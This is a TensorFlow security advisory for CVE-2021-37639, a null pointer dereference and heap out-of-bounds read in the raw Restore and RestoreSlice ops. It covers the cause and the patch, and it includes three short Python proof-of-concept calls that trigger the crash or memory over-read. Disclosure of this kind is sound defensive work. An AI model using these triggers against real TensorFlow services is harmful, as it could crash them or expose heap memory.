## TFSA-2021-113: Null pointer dereference and heap OOB read in operations restoring tensors

### CVE Number
CVE-2021-37639

### Impact
When restoring tensors via raw APIs, if the tensor name is not provided,
TensorFlow can be tricked into dereferencing a null pointer:

```python
import tensorflow as tf

tf.raw_ops.Restore(
  file_pattern=['/tmp'],
  tensor_name=[],
  default_value=21,
  dt=tf.int,
  preferred_shard=1)
```

The same undefined behavior can be triggered by `tf.raw_ops.RestoreSlice`:

```python
import tensorflow as tf

tf.raw_ops.RestoreSlice(
  file_pattern=['/tmp'],
  tensor_name=[],
  shape_and_slice='2',
  dt=inp.array([tf.int]),
  preferred_shard=1)
```

Alternatively, attackers can read memory outside the bounds of heap allocated
data by providing some tensor names but not enough for a successful restoration:

```python
import tensorflow as tf

tf.raw_ops.Restore(
  file_pattern=['/tmp'],
  tensor_name=['x'],
  default_value=21,
  dt=tf.int,
  preferred_shard=42)
```

The
[implementation](https://github.com/tensorflow/tensorflow/blob/47a06f40411a69c99f381495f490536972152ac0/tensorflow/core/kernels/save_restore_tensor.cc#L158-L159)
retrieves the tensor list corresponding to the `tensor_name` user controlled
input and immediately retrieves the tensor at the restoration index (controlled
via `preferred_shard` argument). This occurs without validating that the
provided list has enough values.

If the list is empty this results in dereferencing a null pointer (undefined
behavior). If, however, the list has some elements, if the restoration index is
outside the bounds this results in heap OOB read.

### Patches
We have patched the issue in GitHub commit
[9e82dce6e6bd1f36a57e08fa85af213e2b2f2622](https://github.com/tensorflow/tensorflow/commit/9e82dce6e6bd1f36a57e08fa85af213e2b2f2622).

The fix will be included in TensorFlow 2.6.0. We will also cherrypick this
commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are
also affected and still in supported range.

### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.

### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo
360.
